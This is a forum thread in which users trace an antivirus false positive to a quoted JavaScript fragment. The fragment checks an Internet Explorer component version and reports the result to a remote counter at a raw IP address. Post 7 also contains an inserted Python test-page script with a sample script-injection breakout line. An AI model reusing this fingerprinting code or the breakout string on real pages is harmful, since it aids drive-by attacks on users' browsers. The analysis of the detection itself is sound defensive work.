Warning from NOD32 on DSLR-security-forum thread

Discussion in 'NOD32 version 2 Forum' started by FanJ, Nov 22, 2008.

Thread Status:
Not open for further replies.
  1. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    Posting in this thread at DSLR Security forum:
    http://www.dslreports.com/forum/r21467816-Key-Logger-586523233

     
  2. FanJ

    The thread at the DSLR board on which NOD32 gives a warning, is this one:

    hxxp://www.dslreports.com/forum/r21054284-Trojan-Win32Agentpz-from-Stoneybrook-Assisted-Living-site

    (I have changed http into hxxp)

    That thread is two pages long on my machine and I get the warning on the second page.

    I have already sent an IM to Marcos here on the Wilders board.
    I completely understand that it is the weekend and that ESET does not have the time to look at it at the moment.
    I hope that they will have a look at it after the weekend (please).
     
  3. FanJ

    Maybe the following two screenshots are too big.

    IMON warning
     


  4. FanJ

    AMON warning
     


  5. ASpace

    ASpace Guest

    Do you suspect that the javascript detection is false positive ?
     
  6. FanJ

    Hi HiTech_boy,

    Somehow that is indeed what I'm thinking.
    I can hardly believe that there is malware on the DSLR/BBR security forum.
    The warning I am getting makes me think of a heuristic detection.
    I cannot have a look at that second page because NOD is blocking it, and I do not want to disable NOD at this moment.
    If I see any warning from NOD32 on a file, of course I would send it in in a password-protected ZIP file; but what to do in this case? That's why I have sent Marcos an IM here at Wilders.
     
  7. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    There's no malicious JS in there... this gets triggered on the plaintext code listing there. This has already been debated before with some other example:

    Code:
    // Listing as it appears in plaintext on the DSLR page. It is an IE
    // clientCaps lookup: 'testing' is assumed to be an element carrying the
    // clientCaps behavior, and 's' is the CLSID of the component whose
    // installed version is being checked.
    var i,l,v;
    num = 2;
    s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
    l = testing.isComponentInstalled(s,'ComponentID');
    v = testing.getComponentVersion(s,'ComponentID');
    if (l == true) {
        // version string has the form "a,b,c,d"; older builds (third field
        // below 3810) set num = 1
        x = v.split(',');
        if ( (x[0]!=0) && (x[2]<3810) ) {
            num = 1;
        }
    }

    // the result is reported back to a remote counter as b=1 or b=2
    c = 'http://58.65.232.33/'+'counter.php'+'?b='+num;
    Try to paste the above between <HTML><BODY><PRE> paste here </PRE></BODY></HTML> tags, save the file as test.html or whatever, and watch NOD32 quarantine it.
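An added example (not part of the thread above and not ESET's or doktornotor's code) of the reproduction step just described: a small Python script that wraps a plaintext listing in <html><body><pre> and writes it out as test.html. It HTML-escapes the listing first, because a raw paste into <pre> is only inert as long as the text contains no markup; a line such as `</pre><script>...</script>` would break out of the <pre> and really execute, which would turn a false-positive test file into a live one. The SAMPLE_LISTING, the file name and the helper names are constructed for the example; the `active_content` check reports any element the browser would see beyond the three wrapper tags, so an empty result means the page is pure text.

```python
"""
Build an inert HTML test page from a plaintext code listing, so that an
antivirus detection on the *text* of a script can be reproduced without
any chance of the script running in the browser.
"""
import html
from html.parser import HTMLParser

# Constructed sample listing (not the DSLR page's own code): two lines of
# the kind of version check a heuristic scanner may match on, plus one
# deliberately hostile line that would escape from <pre> if pasted raw.
SAMPLE_LISTING = """\
l = testing.isComponentInstalled(s, 'ComponentID');
if ( (x[0]!=0) && (x[2]<3810) ) { num = 1; }
</pre><script>alert('this must stay inert')</script>
"""


def make_listing_page(listing: str, escape: bool = True) -> str:
    """Wrap a listing in <html><body><pre>.

    escape=True (the safe way) turns '<', '>', '&' and quotes into
    entities, so the listing can never become markup.  escape=False
    reproduces the naive paste, for comparison.
    """
    body = html.escape(listing, quote=True) if escape else listing
    return f"<html><body><pre>{body}</pre></body></html>\n"


class _TagCollector(HTMLParser):
    """Record every start tag and whether any on*= handler attribute appears."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.has_event_handler = False

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if any(name.lower().startswith("on") for name, _ in attrs):
            self.has_event_handler = True


def active_content(page: str) -> set:
    """Return element names the browser would see beyond the wrapper tags
    (plus a marker for inline event handlers).  Empty set == inert page."""
    parser = _TagCollector()
    parser.feed(page)
    parser.close()
    extra = {t for t in parser.tags if t not in {"html", "body", "pre"}}
    if parser.has_event_handler:
        extra.add("event-handler-attribute")
    return extra


def write_test_page(path: str, listing: str) -> set:
    """Write the escaped test page to disk and return its active content
    (which should be empty before the file is handed to a scanner)."""
    page = make_listing_page(listing)
    with open(path, "w", encoding="utf-8") as f:
        f.write(page)
    return active_content(page)


if __name__ == "__main__":
    print("escaped paste :", active_content(make_listing_page(SAMPLE_LISTING)))
    print("raw paste     :", active_content(make_listing_page(SAMPLE_LISTING, escape=False)))
    print("written, active content:", write_test_page("test.html", SAMPLE_LISTING))
```

Run it and point the scanner at the resulting test.html: if the file is flagged, the detection is matching on text, not on anything the browser would execute, which is exactly the situation described in this post. The raw-paste variant is only there to show why the escaping matters; do not hand that one to a scanner from a real page.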
     
  8. FanJ

    Hi,

    Where has this been debated before?
     
  9. doktornotor

    Cannot find the debate ATM; anyway, same problem - some code pasted in plaintext on a website, which doesn't get executed at all, triggered this. This one is apparently a heuristics issue specific to NOD32; tried w/ Avira Premium, no such false positive. Reproduced w/ v3 and v4 beta as well.
     
  10. FanJ

    OK, thanks for checking it !

    Let's hope that ESET will jump in too (haven't heard back from Marcos yet; but as I said, it is the weekend now).
     
  11. FanJ

    As of this moment: no official reply from ESET (neither here in public, nor at the DSLR/BBR board in public, nor in private from Marcos).
    Like I said, I know that it is the weekend; but I would have liked a reply like "we will look at it". But even that did not happen.
     
  12. ASpace


    Currently, with update 3634, I no longer see any alerts and I can browse the forum.
     
  13. doktornotor

    Yeah, looks good now. :thumb:
     
  14. FanJ

    Yep, it's fixed :thumb:

    Thank you ESET, and thank you Marcos for your IM. I really do appreciate it !
     